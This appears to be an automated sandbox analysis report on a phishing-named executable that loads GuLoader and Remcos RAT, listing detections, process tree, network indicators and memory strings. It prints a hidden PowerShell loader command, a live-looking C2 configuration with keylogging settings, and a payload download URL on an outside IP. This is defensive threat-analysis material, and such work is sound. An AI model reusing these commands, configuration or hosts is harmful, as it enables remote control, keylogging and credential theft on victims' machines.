
Windows Analysis Report
order CF08093-24.exe

Overview

General Information

Sample name: order CF08093-24.exe
Analysis ID: 1572358
MD5: 19c071ae3e499df299092283e301b7a2
SHA1: 711e76279688465f62fd3de93ba05328393439cd
SHA256: edc42c5e0e81b4e0598f17cf43ad139e934e32e2538c97811e3b995fa139199f
Tags: exe, RAT, RemcosRAT, user-abuse_ch

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • order CF08093-24.exe (PID: 7152 cmdline: "C:\Users\user\Desktop\order CF08093-24.exe" MD5: 19C071AE3E499DF299092283E301B7A2)
    • powershell.exe (PID: 4956 cmdline: powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Servicerende.Gal55';$Magnoliaceae=$Amanuensissers25.SubString(71792,3);.$Magnoliaceae($Amanuensissers25) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 5752 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 5496 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 1960 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 320 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 2072 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 6120 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\aczzpbalucdoyblxcfryerxbbswqyinsk" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 4396 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dwmsp" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["212.162.149.91:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HSAM04", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000006.00000003.3278532416.0000000007B2A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000006.00000003.3298978061.0000000007B39000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000006.00000003.3298626109.0000000007B37000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000006.00000002.4486408121.000000002340F000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

              System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton, Data: Command: powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Servicerende.Gal55';$Magnoliaceae=$Amanuensissers25.SubString(71792,3);.$Magnoliaceae($Amanuensissers25), CommandLine: powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Servicerende.Gal55';$Magnoliaceae=$Amanuensissers25.SubString(71792,3);.$Magnoliaceae($Amanuensissers25), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\order CF08093-24.exe", ParentImage: C:\Users\user\Desktop\order CF08093-24.exe, ParentProcessId: 7152, ParentProcessName: order CF08093-24.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Servicerende.Gal55';$Magnoliaceae=$Amanuensissers25.SubString(71792,3);.$Magnoliaceae($Amanuensissers25), ProcessId: 4956, ProcessName: powershell.exe
Source: Network Connection, Author: frack113, Data: DestinationIp: 212.162.149.89, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5752, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49922
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Servicerende.Gal55';$Magnoliaceae=$Amanuensissers25.SubString(71792,3);.$Magnoliaceae($Amanuensissers25), CommandLine: powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Servicerende.Gal55';$Magnoliaceae=$Amanuensissers25.SubString(71792,3);.$Magnoliaceae($Amanuensissers25), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\order CF08093-24.exe", ParentImage: C:\Users\user\Desktop\order CF08093-24.exe, ParentProcessId: 7152, ParentProcessName: order CF08093-24.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Servicerende.Gal55';$Magnoliaceae=$Amanuensissers25.SubString(71792,3);.$Magnoliaceae($Amanuensissers25), ProcessId: 4956, ProcessName: powershell.exe

              Stealing of Sensitive Information

Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 5752, TargetFilename: C:\ProgramData\remcos\logs.dat

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T13:52:59.770777+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49933 | 212.162.149.91 | 2404 | TCP
2024-12-10T13:53:01.890405+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49939 | 212.162.149.91 | 2404 | TCP
2024-12-10T13:53:02.178716+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.5 | 49940 | 178.237.33.50 | 80 | TCP
2024-12-10T13:52:56.311136+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49922 | 212.162.149.89 | 80 | TCP


              AV Detection

Source: http://212.162.149.89/xONeIbG151.bin, Avira URL Cloud: Label: malware
Source: 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": ["212.162.149.91:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HSAM04", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes\order CF08093-24.exe, ReversingLabs: Detection: 13%
Source: order CF08093-24.exe, ReversingLabs: Detection: 13%
Source: Yara match, File source: 00000006.00000003.3278532416.0000000007B2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000003.3298978061.0000000007B39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000003.3298626109.0000000007B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.4486408121.000000002340F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.4475133406.0000000007B39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000003.3275406324.0000000007B2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: msiexec.exe PID: 5752, type: MEMORYSTR
Source: Yara match, File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes\order CF08093-24.exe, Joe Sandbox ML: detected
Source: order CF08093-24.exe, Joe Sandbox ML: detected
Source: order CF08093-24.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: order CF08093-24.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: %]qm.Core.pdb source: powershell.exe, 00000002.00000002.3121960782.00000000083C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: re.pdb source: powershell.exe, 00000002.00000002.3121960782.00000000083C8000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\order CF08093-24.exe, Code function: 0_2_0040689E FindFirstFileW,FindClose,0_2_0040689E
Source: C:\Users\user\Desktop\order CF08093-24.exe, Code function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4D
Source: C:\Users\user\Desktop\order CF08093-24.exe, Code function: 0_2_00402930 FindFirstFileW,0_2_00402930
Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 6_2_235F10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_235F10F1
Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 6_2_235F6580 FindFirstFileExA,6_2_235F6580
Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 10_2_0040AE51 FindFirstFileW,FindNextFileW,10_2_0040AE51
Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 11_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407EF8
Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 12_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407898

              Networking

Source: Network traffic, Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49933 -> 212.162.149.91:2404
Source: Network traffic, Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49939 -> 212.162.149.91:2404
Source: Malware configuration extractor, IPs: 212.162.149.91
Source: global traffic, TCP traffic: 192.168.2.5:49933 -> 212.162.149.91:2404
Source: global traffic, HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
Source: Joe Sandbox View, IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View, ASN Name: UNREAL-SERVERSUS UNREAL-SERVERSUS
Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49922 -> 212.162.149.89:80
Source: Network traffic, Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49940 -> 178.237.33.50:80
Source: global traffic, HTTP traffic detected: GET /xONeIbG151.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: 212.162.149.89 | Cache-Control: no-cache
Source: unknown, TCP traffic detected without corresponding DNS query: 212.162.149.89
Source: msiexec.exe, 0000000A.00000002.3298254993.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3297488706.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: msiexec.exe, 0000000A.00000002.3298254993.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3297488706.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: msiexec.exe, 00000006.00000002.4486546941.00000000235C0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmp, String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuddy)
Source: msiexec.exe, msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmp, String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuddy)
Source: msiexec.exe, String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: msiexec.exe, 00000006.00000002.4486764970.0000000023A40000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: msiexec.exe, 00000006.00000002.4486764970.0000000023A40000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic, DNS traffic detected: DNS query: geoplugin.net
Source: msiexec.exe, 00000006.00000002.4486072700.0000000022C70000.00000004.00001000.00020000.00000000.sdmp, String found in binary or memory: http://212.162.149.89/xONeIbG151.bin
Source: msiexec.exe, 00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://212.162.149.89/xONeIbG151.bin005
Source: msiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://212.162.149.89/xONeIbG151.binA
Source: msiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://212.162.149.89/xONeIbG151.bintA
Source: bhvA9CA.tmp.10.dr, String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhvA9CA.tmp.10.dr, String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: powershell.exe, 00000002.00000002.3110396387.0000000002D08000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000002.00000002.3115887918.00000000071C9000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.micro?U
Source: powershell.exe, 00000002.00000002.3121960782.00000000083ED000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.microzE
Source: bhvA9CA.tmp.10.dr, String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhvA9CA.tmp.10.dr, String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhvA9CA.tmp.10.dr, String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: msiexec.exe, 00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://geoplugin.net/json.gp
Source: msiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://geoplugin.net/json.gp?l
Source: msiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://geoplugin.net/json.gpIK
Source: msiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://geoplugin.net/json.gpdK
Source: msiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://geoplugin.net/json.gphymK
Source: order CF08093-24.exe, order CF08093-24.exe.2.dr, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.3114311818.0000000005B99000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhvA9CA.tmp.10.dr, String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000002.00000002.3110901476.0000000004C86000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.3110901476.0000000004C86000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.3110901476.0000000004B31000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.3110901476.0000000004C86000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.3110901476.0000000004C86000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msiexec.exe, msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmp, String found in binary or memory: http://www.ebuddy.com
Source: msiexec.exe, msiexec.exe, 0000000C.00000003.3283992690.000000000327D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000003.3284013613.000000000327D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.3284037369.000000000327E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.3284599032.000000000327E000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://www.imvu.com
Source: msiexec.exe, 0000000C.00000003.3283992690.000000000327D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.3284013613.000000000327D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.3284037369.000000000327E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.3284599032.000000000327E000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://www.imvu.comata
Source: msiexec.exe, 00000006.00000002.4486546941.00000000235C0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmp, String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: msiexec.exe, 00000006.00000002.4486546941.00000000235C0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmp, String found in binary or memory: http://www.imvu.comr
              Source: powershell.exe, 00000002.00000002.3121960782.00000000083C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
              Source: powershell.exe, 00000002.00000002.3121960782.00000000083ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cNU
              Source: msiexec.exe, 0000000A.00000002.3297790419.000000000296F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: powershell.exe, 00000002.00000002.3110901476.0000000004B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000002.00000002.3110901476.0000000004C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
              Source: powershell.exe, 00000002.00000002.3114311818.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.3114311818.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.3114311818.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.3110901476.0000000004C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: msiexec.exe, 0000000A.00000002.3297767350.000000000293C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://login.li
              Source: msiexec.exe, 0000000A.00000002.3298377194.0000000002EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.cD
              Source: msiexec.exe, 0000000A.00000002.3298377194.0000000002EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: msiexec.exe, 0000000A.00000002.3298377194.0000000002EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_deskt
              Source: msiexec.exe, 0000000A.00000002.3298377194.0000000002EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: msiexec.exe, 0000000A.00000002.3298254993.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3297488706.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3298377194.0000000002EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: msiexec.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, 00000002.00000002.3114311818.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
